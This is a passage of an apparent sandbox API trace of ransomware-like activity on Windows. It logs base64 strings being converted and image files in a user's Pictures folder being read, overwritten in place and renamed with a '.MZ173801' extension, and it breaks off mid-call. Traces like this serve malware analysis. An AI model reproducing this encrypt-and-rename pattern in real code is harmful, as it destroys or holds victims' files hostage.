lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0115.260] GetCurrentThreadId () returned 0x1358 [0115.261] GetCurrentThreadId () returned 0x1358 [0115.261] GetCurrentThreadId () returned 0x1358 [0115.261] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0115.261] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0115.261] GetCurrentThreadId () returned 0x1358 [0115.261] GetCurrentThreadId () returned 0x1358 [0115.261] GetCurrentThreadId () returned 0x1358 [0115.261] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\cPoUOQ7FRc3tfk.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\cpouoq7frc3tfk.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0115.261] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d8*=0) returned 0x0 [0115.261] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0115.262] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x13b36 [0115.262] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0115.262] ReadFile (in: hFile=0x3d0, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x13b36, lpNumberOfBytesRead=0x19f6e4, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f6e4*=0x13b36, lpOverlapped=0x0) returned 1 [0115.263] CloseHandle (hObject=0x3d0) returned 1 [0115.264] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\cPoUOQ7FRc3tfk.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\cpouoq7frc3tfk.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0115.265] WriteFile (in: hFile=0x3d0, lpBuffer=0x23c2ad0*, nNumberOfBytesToWrite=0x13b36, lpNumberOfBytesWritten=0x19f6f0, lpOverlapped=0x0 | out: lpBuffer=0x23c2ad0*, lpNumberOfBytesWritten=0x19f6f0*=0x13b36, lpOverlapped=0x0) returned 1 [0115.267] CloseHandle (hObject=0x3d0) returned 1 [0115.269] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\cPoUOQ7FRc3tfk.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\cpouoq7frc3tfk.gif"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\cPoUOQ7FRc3tfk.gif.MZ173801" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\cpouoq7frc3tfk.gif.mz173801")) returned 1 [0115.270] GetCurrentThreadId () returned 0x1358 [0115.270] GetCurrentThreadId () returned 0x1358 [0115.270] GetCurrentThreadId () returned 0x1358 [0115.270] GetCurrentThreadId () returned 0x1358 [0115.270] GetCurrentThreadId () returned 0x1358 [0115.270] GetCurrentThreadId () returned 0x1358 [0115.270] FindNextFileW (in: hFindFile=0xa1be00, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33cfb4a0, ftCreationTime.dwHighDateTime=0x1d5e4c8, ftLastAccessTime.dwLowDateTime=0xda46e4e0, ftLastAccessTime.dwHighDateTime=0x1d5e6a1, ftLastWriteTime.dwLowDateTime=0xda46e4e0, ftLastWriteTime.dwHighDateTime=0x1d5e6a1, nFileSizeHigh=0x0, nFileSizeLow=0xbe41, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="DHkWFe3.jpg", cAlternateFileName="")) returned 1 [0115.270] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0115.270] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0115.270] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\DHkWFe3.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\dhkwfe3.jpg"), fInfoLevelId=0x0, lpFileInformation=0x19f724 | out: lpFileInformation=0x19f724*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33cfb4a0, ftCreationTime.dwHighDateTime=0x1d5e4c8, ftLastAccessTime.dwLowDateTime=0xda46e4e0, ftLastAccessTime.dwHighDateTime=0x1d5e6a1, ftLastWriteTime.dwLowDateTime=0xda46e4e0, ftLastWriteTime.dwHighDateTime=0x1d5e6a1, nFileSizeHigh=0x0, nFileSizeLow=0xbe41)) returned 1 [0115.271] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0115.271] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0115.271] GetCurrentThreadId () returned 0x1358 [0115.271] GetCurrentThreadId () returned 0x1358 [0115.271] GetCurrentThreadId () returned 0x1358 [0115.271] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0115.271] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0115.272] GetCurrentThreadId () returned 0x1358 [0115.272] GetCurrentThreadId () returned 0x1358 [0115.272] GetCurrentThreadId () returned 0x1358 [0115.272] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\DHkWFe3.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\dhkwfe3.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0115.272] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d8*=0) returned 0x0 [0115.272] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0115.272] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0xbe41 [0115.272] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0115.272] ReadFile (in: hFile=0x3d0, lpBuffer=0x2431b30, nNumberOfBytesToRead=0xbe41, lpNumberOfBytesRead=0x19f6e4, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f6e4*=0xbe41, lpOverlapped=0x0) returned 1 [0115.899] CloseHandle (hObject=0x3d0) returned 1 [0115.909] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\DHkWFe3.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\dhkwfe3.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0115.911] WriteFile (in: hFile=0x3d0, lpBuffer=0x243db60*, nNumberOfBytesToWrite=0xbe41, lpNumberOfBytesWritten=0x19f6f0, lpOverlapped=0x0 | out: lpBuffer=0x243db60*, lpNumberOfBytesWritten=0x19f6f0*=0xbe41, lpOverlapped=0x0) returned 1 [0115.912] CloseHandle (hObject=0x3d0) returned 1 [0115.914] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\DHkWFe3.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\dhkwfe3.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\DHkWFe3.jpg.MZ173801" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\dhkwfe3.jpg.mz173801")) returned 1 [0115.915] GetCurrentThreadId () returned 0x1358 [0115.915] GetCurrentThreadId () returned 0x1358 [0115.915] GetCurrentThreadId () returned 0x1358 [0115.915] GetCurrentThreadId () returned 0x1358 [0115.915] GetCurrentThreadId () returned 0x1358 [0115.915] GetCurrentThreadId () returned 0x1358 [0115.915] FindNextFileW (in: hFindFile=0xa1be00, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x366a1b00, ftCreationTime.dwHighDateTime=0x1d5e8ac, ftLastAccessTime.dwLowDateTime=0xb429fb70, ftLastAccessTime.dwHighDateTime=0x1d5f039, ftLastWriteTime.dwLowDateTime=0xb429fb70, ftLastWriteTime.dwHighDateTime=0x1d5f039, nFileSizeHigh=0x0, nFileSizeLow=0x5b74, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="dzGys1Cl.jpg", cAlternateFileName="")) returned 1 [0115.915] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0115.915] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0115.915] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\dzGys1Cl.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\dzgys1cl.jpg"), fInfoLevelId=0x0, lpFileInformation=0x19f724 | out: 